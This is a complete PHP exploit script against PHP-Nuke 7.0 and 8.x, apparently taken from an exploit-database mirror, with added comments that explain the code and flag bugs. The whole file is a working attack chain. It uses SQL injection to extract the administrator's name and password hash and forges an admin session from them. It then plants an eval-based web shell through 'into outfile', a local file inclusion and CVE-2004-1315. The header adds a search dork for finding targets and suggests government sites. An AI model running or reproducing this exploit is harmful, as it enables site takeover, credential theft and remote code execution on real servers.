
/platforms/php/webapps/12510.php

https://github.com/ButtNet/exploit-database
  1. #!/usr/bin/php
  2. <?php
  3. /*******************************************************************************
  4. Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35 (newest as of release)
  5. Vendor's Website:http://phpnuke.org/
  6. Security Researcher: Michael Brooks (https://sitewat.ch)
  7. Original Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html
  8. Google hack:
  9. "Francisco Burzi" "Page Generation:" Seconds inurl:modules.php
  10. 1,170,000 results
  11. add inurl:gov to the google hack if you want to make the news ;)
  12. Works with magic_quotes_gpc=On or Off
  13. Works with AppArmor and Suhosin Hardened-PHP, tested on Ubuntu 9.04 and 10.04
  14. My own LFI+SQLI attack is used to bypass AppArmor!
  15. Also tested XAMPP on Windows XP
  16. All tests were done with MySQL5 and PHP5
  17. To obtain a user's cookie:
  18. 1) Register a normal account
  19. 2) Login
  20. 3) Type this into the same address bar and hit enter: javascript:document.cookie
  21. To set a cookie you can use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"
  22. *******************************************************************************/
//Lift PHP's maximum execution time: the timing probes below deliberately wait whole seconds per request.
set_time_limit(0);
//The blind_sql_injection class (defined further down) is a general exploit framework that the
//PHP-Nuke specific class below inherits from.
//PHP-Nuke specific subclass: only supplies the request that carries the injected query.
class php_nuke_blind_sql_injection extends blind_sql_injection {
//This is the blind sql injection request.
//$check is a MySQL expression built by blind_sql_injection::send(); it is placed
//unquoted inside the Referer header, which is the injection point for this target.
function query($check){
//Rate limiter to stay under ipban.php's protection: pause on every 4th request.
//Must stay below 5 requests every 2 seconds.
//(request_count is incremented by the parent's send() after each request, so the
//very first request also sleeps.)
if(!($this->request_count%4)){
sleep(2);
}
//build the http request to Inject a query:
//This is a simple get request with a custom referer. Seen from the server, every
//probe is a GET whose Referer header contains SQL syntax (select ... from nuke_authors).
//$this->set_referer("'="/\*" (select ".$check." from nuke_authors limit 1))-- */");
$this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");
/*example get and post request.
*$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]
*$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]
*/
}
}
  43. //This is a very efficient blind sql injection class.
class blind_sql_injection{
//url: target for each request; backup_url: copy restored by send() after set_get();
//http: the http_client used for requests; request_count: requests sent so far;
//timeout: seconds the injected sleep() waits and the threshold send() compares against.
//$result is declared but never used in this file.
//NOTE(review): PHP 4-style class (var properties, constructor named after the class);
//written for the PHP 5 era and not usable unchanged on PHP 8.
var $url, $backup_url, $result, $http, $request_count, $timeout;
//Constructor: keep the url twice (working copy and pristine copy) and create the http client.
function blind_sql_injection($url,$timeout=10){
$this->request_count=0;
$this->url=$url;
$this->backup_url=$url;
$this->http=new http_client();
$this->timeout=$timeout;
}
//Append a query string to the working url (undone by send() after each request).
function set_get($get){
$this->url=$this->url."?".$get;
}
//Set the Referer header sent with the next request.
function set_referer($referer){
$this->http->referer=$referer;
}
//Set the POST body; a non-empty body makes http_client send a POST instead of a GET.
function set_post($post){
$this->http->postdata=$post;
}
//Timing oracle sanity check: sleep() under a true condition must delay the response
//and the same sleep() under a false condition must not; true only when both hold.
function test_target(){
return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");
}
//Turn an array of integers 0..15 into a lowercase hex string
//(0-9 as digits, 10-15 as 'a'-'f' via chr(87+$a)).
function num_to_hex($arr){
$ret='';
foreach($arr as $a){
if($a<=9){
$ret.=$a;
}else{
$ret.=chr(87+$a);
}
}
return $ret;
}
//Looking for a string of length 32 and base 16 in ascii chars.
//Each position is recovered as the numeric value of one hex digit (conv(...,16,10)).
function find_md5($column){
return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));
}
//Same as find_md5() for a 40 character hex string.
function find_sha1($column){
return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));
}
//Look for an ascii string of arbitrary length.
//Each position is recovered as its ascii code (base 128) and turned back into a character.
function find_string($column){
$ret='';
//A length of zero means we are looking for a null byte terminated string.
$result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))");
foreach($result as $r){
$ret.=chr($r);
}
return $ret;
}
//query() is a method that generates the sql injection request
//from the MySQL expression $check handed over by send().
function query($check){
//This function must be overridden.
}
//Re-verify a result with a longer timeout.
//NOTE(review): not called anywhere in this file; $start and $b are never assigned,
//and $result is a by-value copy, so the appended value is discarded.
function recheck($result,$question,$base){
$this->bin_finder($base,1,$question,$start);
//Force a long timeout.
$tmp_timeout=$this->timeout;
if($this->timeout<10){
$this->timeout=10;
}else{
$this->timeout=$this->timeout*2;
}
$l=1;
foreach($result as $r){
if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){
$result[]=$b;
break;
}
$l++;
}
$this->timeout=$tmp_timeout;
}
//Linear alternative to bin_finder(): one request per candidate value 0..$base-1 per position.
//NOTE(review): not called from this file, and $result is filled but never returned.
function linear_finder($base,$length,$question){
for($l=1;$l<=$length;$l++){
for($b=0;$b<$base;$b++){
if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){
$result[]=$b;
break;
}
}
}
}
#Binary search for mysql based sql injection.
#Recovers one value per position $cur by comparing greatest()/least() of the target
#expression with the midpoint $pos: "greater" moves $low up, "less" moves $high down,
#neither means $pos is the value. $length==0 means "stop at the first null byte".
#Prints one "." per recovered position.
#NOTE(review): $result starts as '' and is then extended with []=, which PHP 7.1+
#rejects on strings - confirm against the PHP version this script is run with.
function bin_finder($base,$length,$question){
$start_pos=1;
$result='';
for($cur=$start_pos;$cur<=$length||$length==0;$cur++){
$n=$base-1;
$low=0;
$floor=$low;
$high=$n-1;
$pos= $low+(($high-$low)/2);
$found=false;
while($low<=$high&&!$found){
#asking the sql database if the current value is greater than $pos
if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
#if this is true then the value must be the modulus.
if($pos==$n-1){
$result[]=$pos+1;
$found=true;
}else{
$low=$pos+1;
}
#asking the sql database if the current value is less than $pos
}else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){
#if this is true the value must be zero, or in the case of ascii, a null byte.
if($pos==$floor+1){
$found=true;
#We have found the null terminator so we have finished our search for a string.
if($length==0){
$length=-1;
}else{
$result[]=$pos-1;
}
}else{
$high=$pos-1;
}
}else{
#both greater than and less than were asked, so the answer is our guess $pos.
$result[]=$pos;
$found=true;
}
$pos=$low+(($high-$low)/2);
}
print(".");
}
return $result;
}
//Fire off the request
//Hands the MySQL expression to query() (which builds the actual request), sends it,
//restores the url, bumps request_count and returns true when the round trip took at
//least $timeout seconds. The response body ($resp) is not inspected here, and time()
//only has one-second resolution.
function send($quesiton){
//build the injected query.
$this->query($quesiton);
$start=time();
$resp=$this->http->send($this->url);
//backup_url is for set_get()
$this->url=$this->backup_url;
$this->request_count++;
return (time()-$start>=$this->timeout);
}
//retroGod RIP
//Encode $string as a MySQL char(byte,byte,...) expression so it needs no quote characters.
//NOTE(review): assigning ")%00" to a single string offset keeps only the first
//character, so the trailing comma becomes ")" and the "%00" is never appended.
function charEncode($string){
$char="char(";
$size=strlen($string);
for($x=0;$x<$size;$x++){
$char.=ord($string[$x]).",";
}
$char[strlen($char)-1]=")%00";
return $char;
}
}
  194. //General purpose http client that works on a default php install.
class http_client{
//proxy_*: optional HTTP proxy and its basic-auth credentials (filled in by proxy()).
//referer/cookie: header values added to every request when non-empty.
//postdata: raw urlencoded body; when non-empty the request is a POST, otherwise a GET.
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';
//Send one HTTP/1.1 request to $loc over a raw socket and return the complete raw
//response (status line, headers and body, read until EOF), or false when the
//connection fails. Callers therefore match on header text as well as body text.
function send($loc){
//overload function polymorphism between gets and posts
$url=parse_url($loc);
if(!isset($url['port'])){
$url['port']=80;
}
//Hard-coded, non-browser-like header values (bare "Firefox" UA, Accept: text/plain).
$ua='Firefox';
//Through a proxy the request line carries the absolute host:port/path form.
//NOTE(review): "&$errno"/"&$errstr" is call-time pass-by-reference, which PHP 5.4
//removed; this script was written for PHP 5 and does not compile as-is on current PHP.
if($this->proxy_ip!=''&&$this->proxy_port!=''){
$fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );
$url['path']=$url['host'].':'.$url['port'].$url['path'];
}else{
$fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );
}
if( !$fp ) {
print "$errstr ($errno)<br>\nn";
return false;
} else {
//The method follows from whether a POST body was set. $url['query'] is used even
//when absent, so a bare path is sent with a trailing "?".
if( $this->postdata=='' ) {
$request="GET ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
} else {
$request="POST ".$url['path']."?".$url['query']." HTTP/1.1\r\n";
}
//NOTE(review): this header ends with a blank line ("\r\n\r\n"), which terminates the
//header block before Host/Cookie/etc. are written whenever proxy auth is in use.
if($this->proxy_name!=''&&$this->proxy_pass!=''){
$request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\r\n\r\n";
}
$request.="Host: ".$url['host'].":".$url['port']."\r\n";
$request.="User-Agent: ".$ua."\r\n";
$request.="Accept: text/plain\r\n";
if($this->referer!=''){
$request.="Referer: ".$this->referer."\r\n";
}
$request.="Connection: Close\r\n";
if($this->cookie!=''){
$request.="Cookie: ".$this->cookie."\r\n" ;
}
if( $this->postdata!='' ) {
$strlength = strlen( $this->postdata );
$request.="Content-type: application/x-www-form-urlencoded\r\n" ;
$request.="Content-length: ".$strlength."\r\n\r\n";
$request.=$this->postdata;
}
//Write the request and read until the server closes the connection (Connection: Close).
fputs( $fp, $request."\r\n\r\n" );
while( !feof( $fp ) ) {
$output .= fgets( $fp, 1024 );
}
fclose( $fp );
//php_nuke only: the target's request throttle answered instead of the page, so abort.
if(strstr($output,"too many page loads")){
print "REQUEST CAP HIT!\n";
print_r(debug_backtrace());
print "REQUEST CAP HIT!\n";
die();
}
return $output;
}
}
//Use a http proxy
//Parse "user:pass@ip:port" or plain "ip:port" into the proxy_* properties.
function proxy($proxy){ //user:pass@ip:port
$proxyAuth=explode('@',$proxy);
if(isset($proxyAuth[1])){
$login=explode(':',$proxyAuth[0]);
$this->proxy_name=$login[0];
$this->proxy_pass=$login[1];
$addr=explode(':',$proxyAuth[1]);
}else{
$addr=explode(':',$proxy);
}
$this->proxy_ip=$addr[0];
$this->proxy_port=$addr[1];
}
//Parses the results from a PHP error to use as a path disclosure.
//Looks for the "... array given in <b>PATH</b>" fragment of a PHP warning (or the
//xdebug variant without markup), then drops $pops trailing components using "\" or
//"/" as separator. Yields an empty string when no such warning is in the response.
function getPath($url,$pops=1){
$html=$this->send($url);
//Regular error reporting:
$resp=explode("array given in <b>",$html);
if(isset($resp[1])){
$resp = explode("</b>",$resp[1]);
}else{
//xdebug's error reporting:
$resp=explode("array given in ",$html);
if(isset($resp[1])){
$resp = explode(" ",$resp[1]);
}else{
$resp[0]=false;
}
}
$path=$resp[0];
//Can't use dirname()
if(strstr($path,"\\")){
$p=explode("\\",$path);
for($x=0;$x<$pops;$x++){
array_pop($p);
}
$path=implode("\\",$p);
}else{
$p=explode("/",$path);
for($x=0;$x<$pops;$x++){
array_pop($p);
}
$path=implode("/",$p);
}
return $path;
}
//Grab the server type from the http header.
//Returns the text after the first "Server: " up to the next newline (empty if absent).
function getServer($url){
$resp=$this->send($url);
$header=explode("Server: ",$resp);
$server=explode("\n",$header[1]);
return $server[0];
}
}
//Entry point. Options: -t target base url (required), -c a registered user's cookie,
//-a an admin cookie (debug only). Flow: obtain or forge an admin session, then use admin
//functionality to write a PHP file on the target and request it.
//Side effects a defender can look for, all taken from the requests below: display_errors
//toggled through admin.php?op=savegeneral, a junk AddAuthor submission, "into outfile"
//writes of frontend.php and /tmp/theme.php, and on *nix the Default_Theme setting pointed
//at a "../" traversal path.
function main(){
$user_input=getopt("t:c:a:");
//getopt() omits options that were not given, so these reads raise a notice when absent
//and an empty value is treated like a missing one.
if($user_input['t']){
$attack_url=$user_input['t'];
if($user_input['c']){
$user_cookie=$user_input['c'];
}
//This is only useful for debugging, so it's not listed in the usage.
if($user_input['a']){
$admin_cookie=$user_input['a'];
}
}else{
print("Useage: ./php_exploit -t http://localhost\n");
die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
//Normalise the base url. $http is the client for the admin steps; $sex (the blind
//injector) carries its own http_client.
$attack_url=str_replace("index.php","",$attack_url);
$http=new http_client();
$sex=new php_nuke_blind_sql_injection($attack_url."/");
//Without -a, the admin's name and password hash are recovered first.
if(!$admin_cookie){
//This is what a cookie looks like:
//2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
//$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
if($user_cookie){
//Route 1 (authenticated user): SQL injection in the Journal module's savenew form.
//The result is read back from the saved journal entry, so it is not blind.
print "Using cookie...\n";
$http->cookie=$user_cookie;
//1337+30000 is used as a pivot in parsing, and to test for a successful injection.
//This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.
$http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
//This part of the exploit is a bit strange, sorry for the mess, gotta release!
//A "history.go(-1)" page means the first form submission was rejected.
if(strstr($response,"javascript:history.go(-1)")){
//magic_quotes_gpc=on
$http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
//strpos() without "!== false": a match at offset 0 would count as not found.
if(strpos($response,"31337")){
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}else{
//magic_quotes_gpc=off
sleep(3);
$http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
sleep(2);
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
$jid=explode("\">",$jid[1]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);
$inj=explode("Last updated on ",$response);
$inj=explode(" @ ",$inj[1]);
$pass_hash=$inj[0];
$inj=explode("<",$inj[1]);
$user_name=$inj[0];
}
}else{
//The first submission was accepted: read the new entry straight back.
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow',<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
if(!strpos($response,"31337")){
die("target has patched!\n");
}else{
print "Target vulnerable to a privilege escalation attack!!!\n";
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}
}
}else{
//Route 2 (no cookie): time-based blind SQL injection through the Referer header
//(see php_nuke_blind_sql_injection::query()), one request per comparison.
//NOTE(review): the "sleep" property is assigned here but never read in this file;
//the delay actually used is blind_sql_injection::$timeout.
$sex->sleep="sleep(5)";
print "Starting Attack Against:".$attack_url."/\n";
print "Testing for blind sql injection...\n";
if(!$sex->test_target()){
print("Target might be running 8.1.35\n");
print("Try the privilege esciation attack to upload the shell:");
die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
print "Target is vulnerable to blind sql injection!!!\n";
print "Please Standby For Attack...\n";
$pass_hash=$sex->find_md5("pwd");
$user_name=$sex->find_string("aid");
print "attacked used:".$sex->request_count." requests.\n";
}
print "Found Admin's name:".$user_name."\n";
print "Found MD5 Password hash:".$pass_hash."\n";
//The admin cookie is base64("name:md5hash:"), so the stored hash alone is enough for a session.
$admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";
}
print "Using Admin Session ID:\n".$admin_cookie."\n";
$http->cookie=$admin_cookie;
//ipban.php
sleep(3);
//This request will tell us what version of php-nuke it is.
//If it is 8, then the page gives us configuration information to preserve.
//http_client::send() returns the headers too, so "Content-Length: 0" is matched there.
$admin_options=$http->send($attack_url."/admin.php?op=general");
if(!strstr($admin_options,"Content-Length: 0")){
print "PHP-Nuke 8 detected.\n";
//Collect the first five value='...' attributes of the general settings form.
$option_values=explode("value='",$admin_options);
$x=0;
array_shift($option_values);
//Parsing out and storing configuration values to restore them after the hack.
foreach( $option_values as $value){
$value=explode("'",$value);
$values[]=urlencode($value[0]);
if($x++==4)
break;
}
//ipban.php
sleep(2);
//Enable error reporting (xdisplay_errors=1) while re-submitting the saved settings;
//the path disclosure below depends on warnings being displayed.
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
//Path disclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
//getPath() then drops 3 trailing components of the script path in the warning.
$http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
$remote_path=$http->getPath($attack_url."/admin.php",3);
sleep(2);
//A drive letter ("X:\") in the disclosed path means a Windows host.
if(strstr($remote_path,':\\')){
print "Windows box detected.\n";
print "Remote path:$remote_path\n";
print "Uploading backdoor...\n";
//Windows: frontend.php is written straight into the web root with "into outfile"
//through the modifyUser injection, then display_errors is turned back off.
$remote_path=addslashes(addslashes($remote_path."\\frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1");
$re=$http->send($attack_url."/admin.php?op=modifyUser");
//Disable error reporting
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
}else{
print "*nix box detected.\n";
print "Remote path:$remote_path\n";
//Is mysql on the same machine as the httpd?
//load_file() on the target's own index.php only succeeds when MySQL runs on the same
//host with file privileges; "User Doesn't Exists!" means that probe failed.
sleep(2);
$http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1");
$mysql_check=$http->send($attack_url."/admin.php?op=modifyUser");
if(strstr($mysql_check,"User Doesn't Exists!")){
print("MySQL isn't on the same machine or you do not have file privileges.\n");
die("Remote code execution failed\n");
}
print "Uploading backdoor...\n";
//ipban.php
sleep(2);
//Grab the theme, this is needed to repair the database after the LFI
$theme=$http->send($attack_url."/admin.php?op=themes");
$theme=explode('src="themes/',$theme);
$theme=explode('/images/',$theme[1]);
//Repair the database after the LFI.
//The staged file restores Default_Theme and display_errors when it is included.
$backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");';
//This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
$backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
//Install the backdoor in a relative directory.
$backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));';
//charEncode is used to bypass XSS filters.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
//Stage the installer as /tmp/theme.php; MySQL must be able to write there.
$http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
$http->send($attack_url."/admin.php?op=modifyUser");
sleep(2);
//local file include vulnerability to execute /tmp/theme.php: Default_Theme is pointed
//at a "../" path to /tmp, so the theme loader includes the staged file.
$http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url."/admin.php");
sleep(2);
$http->postdata='';
//Fire off a get request to trigger the uploaded php file using LFI
$http->send($attack_url);
sleep(2);
//Try the LFI again, just in case.
$http->send($attack_url."/admin.php");
}
sleep(2);
//test if the backdoor works, try and clean up after the exploit.
//(Only /tmp/theme.php is removed; frontend.php itself is left in place.)
$test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
if(strstr($test_backdoor,"31337")){
print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
}else{
print "Backdoor install failed!\n";
}
}else{
////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
print "PHP-Nuke 7 detected.\n";
$http->postdata="";//send get requests.
//Fire off a check for CVE-2004-1315, phpbb may be installed.
//This is more like the original CVE-2004-1315: %2527.printf(20041315).%2527
//php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
//to bypass this check double urlencode the parens () %2527.printf%252820041315%2529.%2527
$try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
//if the exploit didn't work, then we might have to enable phpbb and populate it.
if(!strstr($try_exploit,"20041315")){
//Enable PHPBB
$http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");
//create a new category for phpbb
$http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";
$t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");
//ipban.php
sleep(2);
//create a new forum in the new category
$http->postdata="forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
$t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
$http->postdata="forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
//create a new topic in the new forum
$http->postdata="username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
$http->send($attack_url."/modules.php?name=Forums&file=posting");
//ipban.php
sleep(2);
//access the first topic.
$http->postdata="";
//Check to see if any of the first 10 topics are exploitable.
//(Runs t=1..9 and stops as soon as the marker shows up in a response.)
for($t=1;$t<10&&!strstr($try_exploit,"20041315");$t++){
//Fire off a check for CVE-2004-1315.
$try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");
}
}
//Check if we were able to hit CVE-2004-1315.
if(strstr($try_exploit,"20041315")){
print("Remote Code execution tested successfully:\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n");
}else{
print("Remote code execution has failed!\n");
}
}
}
//Script entry: everything runs from main() (see its usage text for the -t/-c/-a options).
main();
?>